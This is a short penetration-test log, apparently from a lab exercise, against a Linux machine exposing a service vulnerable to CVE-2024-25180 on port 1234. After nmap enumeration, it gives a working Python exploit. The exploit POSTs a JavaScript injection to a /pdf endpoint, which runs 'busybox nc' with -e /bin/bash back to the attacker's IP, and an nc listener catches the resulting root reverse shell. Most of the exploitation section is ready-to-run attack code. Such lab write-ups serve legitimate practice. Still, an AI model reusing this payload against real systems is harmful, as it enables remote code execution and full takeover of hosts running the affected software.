CVE-2024-25180

🧪 Pentest Log: {{date:2025-07-23}}

🔍 Target Information

Machine Name: CVE-2024-25180
IP Address: 192.168.152.42
Operating System: Linux

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.152.42 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV 192.168.152.42 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.152.42 -oN udp_scan_result.txt

Port 22

Port 1234

found CVE-2024-25180

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 1234
Vulnerability Type: (e.g., RCE, LFI, SQLi, etc.) RCE

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

import requests

data = {
    "content": "this.process.mainModule.require('child_process').execSync('busybox nc 192.168.45.163 1234 -e /bin/bash').toString(); const dd = 2"
}

resp = requests.post("http://192.168.152.42:1234/pdf", data=data)
print(resp.text)

nc -lvnp 1234

🧬 Privilege Escalation

👤 Current Access

User: root
Groups: root
Shell Type: (reverse shell / web shell / meterpreter / etc.) reverse shell